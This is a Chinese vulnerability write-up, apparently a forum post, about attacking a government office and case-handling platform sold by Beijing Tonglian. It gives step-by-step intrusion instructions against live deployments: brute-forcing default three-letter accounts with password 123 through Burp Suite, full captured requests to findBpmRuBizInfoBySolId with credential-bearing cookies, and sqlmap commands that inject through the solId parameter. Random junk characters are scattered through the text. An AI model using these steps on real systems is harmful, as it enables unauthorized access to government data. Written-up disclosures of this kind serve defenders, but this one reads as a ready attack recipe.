|
9 l9 l6 d; k' Z/ ^1 `, i8 P# b
$ p4 c2 ^0 ]# K$ B! X
, O) H4 y _- n" V
" A1 C% e( J2 E1 l5 ]+ |5 Y/ x- c! b
平台简介:
) w1 m3 h, R4 b0 T# j$ `: n
, p) ]: Y o d* A* }; i, [: C
; y/ b4 \. a0 w' W , t, c$ _! `9 G% g
1 X/ V! d b$ C4 J" |& e( u3 c. W p. z
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。 / y1 { ?. h0 d4 v+ ~
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
9 U# I4 \5 l0 T( T! _# R* c6 t$ o同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!1 b k$ @5 |+ c
4 g O9 Q$ |; w
- ~4 H6 A# l7 Z& S) M4 W. R % [# I! r4 \& C, c4 B
1 u1 Y. d; i; D9 J! Q
: F8 [' K5 D: U/ b% P( {
由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:% v! R6 J3 [ u+ R8 B i
0 K m( d) d" W! H$ j* Y$ w
$ ^7 o' r) R( A- p, ~- r& X
& y. r3 a6 I! v/ t' E, W# _9 u& h
! h) H: X Z R5 \" p o3 _5 @ C/ ]5 V8 L$ }+ I
http://1.1.1.1:7197/cap-aco/#(案例2-)
, C! l. f4 p8 {" D7 K * k" D# t5 T& {7 v2 n [* |" L
9 T9 a, x7 X8 r4 _! S
http://www.XXOO.com (案例1-官网网站)
7 z2 f5 J9 X: |8 o" J , M: \: x! G9 w7 r; X
3 N. r3 s" O6 H. J+ b4 j' W3 d, K6 G
; `& h9 Q& C; R6 O ( P; L1 U* ^3 p; z% Z$ t; L" e
4 ^0 g M: s* a/ \* u$ j8 l2 V 漏洞详情:% i5 i1 Y1 h! A0 U. X# W
3 G; g% a# d1 P G( ]% K _
7 I2 F/ q6 ^8 R% i6 s 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
$ Q0 i z" M% K* ^7 V
& O! F. w0 U: t! H% K# ?7 a
' o9 g7 {3 @% L% c: {+ s6 F 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
5 ?: X- R4 o' u0 A* m # g: x1 |( X! \: `
, N1 Z/ U5 |! |5 E/ O" i( k8 ~
u& E7 F) `" k) N: P- t c ) _: N2 o# ]+ z' O/ w; f0 q
9 N% b2 u( b5 [- z
$ b* r. |5 e! b
8 }9 M: g6 {6 U: o" b
+ C# g& Z3 L! I! ` status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:( C# l; t* Q. {' W$ P& q e; i
5 ]$ z5 F. X$ Q- I( R8 d* U6 d+ j2 M3 Z# Q: @ x
1、案例1-官方网站
' H; W* }3 j5 l/ O: ]8 U 0 e% }8 @% C5 g9 n
- t8 H1 Z$ s9 L3 K' n- \& E8 P3 g
GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1
4 s& L9 ?; ]" y6 T
+ [$ R# g" b5 e; f
5 W# l, T5 B; ~9 q9 ~: x Host: www.XXOO.com Q+ }1 J+ h; c% x, H
+ b, s9 j1 b' D7 j
3 E7 b: ?. |, i" c
Proxy-Connection: Keep-Alive4 |* b- e @/ v r0 Y L
; J5 ]4 z" h' c1 p. a& [( j7 I' h6 J
Accept: application/json, text/javascript, */*; q=0.015 R |# H4 h. I& b f
. o w/ u% ~- v% q2 P5 u0 ]# C8 I) }4 A1 A6 a8 j
Accept-Language: zh-CN0 j- j+ j$ _. k+ a. {' V( Z
/ E; x% ]5 u) x
' g% e% b& q5 L' L/ q Content-Type: application/json" ?1 U( J# _" E
- O" M0 p8 H* e- V' i( s. X( `. e
( Y% [5 e5 r* r2 |8 { User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko3 h. z2 Z+ W% L6 C+ E. y
! s) P. V0 c5 O
2 A$ ?- @* b" f$ R X-Requested-With: XMLHttpRequest
0 F- i! V# W% `. g 7 [4 ?- Z2 x& X( y8 n
1 S$ o3 D/ I7 L1 o1 D- l
Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002* z3 b/ b- j' r( Q2 r
) h& q5 S* ]) v5 [; Z6 S
) U! Y6 S& Q7 F" C9 x8 i* S1 [7 ], z Accept-Encoding: gzip, deflate, sdch
3 B0 H6 F- Y: S. ]0 t) S
& c2 V L; [3 {+ C9 O
+ |' ^& p4 L$ _6 f% @1 L Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e
4 m+ I0 {: O: K6 l / a# d& E" b% k4 Z1 }
]! b. u n) M6 A
将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:3 C0 x4 S5 y& W2 @- V, x
( P z9 s( e2 q5 s
3 N! J# s6 x$ F' T
8 w+ C: s1 _9 Q& I6 U) L7 y
: v. N3 r6 H* S/ h B v4 w
8 v3 B$ V: a8 ^8 C9 p
5 Q: ?& E9 s }! g * _) }% e1 [; C+ B# A! k
, L1 `0 u0 k- k0 k
, Q% Z& _3 k% ^# B* r' F
. {1 |5 u' ~* ]/ S) e, X
$ C0 C) n8 e# y( G; T- W1 [( u a
5 P; y$ U/ V' [0 i3 p
4 `/ u9 B% q7 X6 x5 ~2 Y3 O8 A6 b- O b, ~
% f5 o) h+ r% `% i, F! N
: W! P: i- S% ~
7 j J: z, c* E1 d1 K5 W% {8 w 2、案例2-某天河云平台+ P3 u+ |6 K; Y9 C
[$ a3 \$ A$ Y: E/ P- Z4 q
, O1 M. B1 i) H! D% E GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1
2 P) c8 i9 ^) K5 {5 E : M. Q: |0 H( M* t$ k2 _8 d
1 s+ D. [# }- e+ N Host: 1.1.1.:71979 P0 \! q! c7 @6 ~9 z( H [4 \
0 k5 r/ Y6 H+ N* u9 K
! B' |! L, e- Y4 A6 w/ U) W
Accept: application/json, text/javascript, */*; q=0.01
" L2 }: L. |2 g
[8 x& n7 _2 i/ m2 F K/ k
9 [$ p6 e- x* Y# m X-Requested-With: XMLHttpRequest
& H/ ~3 A% j% W. [+ h# V ) K* @3 D7 M4 L9 m c5 X5 b4 s1 j
; I! ?5 w$ k3 l6 U& I" A! ^ User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0
?" W" D2 N0 ? 5 Q1 ]" J; z2 _ J- C
# B0 d+ F/ X9 L/ O4 Y: V Content-Type: application/json
0 x. I) d; z3 S' A # ~: @# Z+ G [; ?3 `' c# M
- B A$ B, z+ Q* D) G$ m! U* P- M2 L Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008/ \ R: ^+ O& |3 \/ q
; G z9 y' I9 ^- l: i4 Y6 G/ V5 E0 O7 `" b3 r1 x0 z+ y; W1 f
Accept-Language: zh-CN,zh;q=0.8" ^; C M! Y$ L4 S
* o: {0 T$ Z: U5 L( ^
1 n8 w7 F* B: `) V' L) ^. }- z$ W4 h
Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1
4 t. e; f1 ]4 ?: V
1 o: A/ k" K: X! W+ j: b
4 y7 R3 e# r) p3 F0 m) l& M3 @ Connection: close
$ Q' `8 ] f" H, J
9 J" b. n i& y9 v* J) m' P
. V# x( X1 ~1 I% O- |- a 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:4 g, q6 n) Y+ e9 M6 I! {- B, ]# ]
$ [/ m1 n0 l0 Z7 G! s% k- B/ L8 B- h& |; d
?- W- l9 X( t2 i) I ; v) m6 ` z" G0 v. c Q3 ^
0 ^) l- M; V, F
0 `+ U6 H" ^, d: y! }
|